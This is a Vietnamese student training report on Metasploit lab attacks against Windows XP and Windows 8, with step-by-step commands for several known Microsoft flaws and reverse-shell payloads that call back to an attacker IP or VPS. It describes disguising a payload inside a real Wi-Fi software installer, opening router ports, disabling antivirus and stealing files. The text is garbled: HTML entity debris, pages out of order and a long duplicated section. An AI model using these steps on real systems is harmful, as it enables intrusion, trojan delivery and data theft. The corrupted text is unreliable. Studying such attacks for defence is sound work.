- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
20
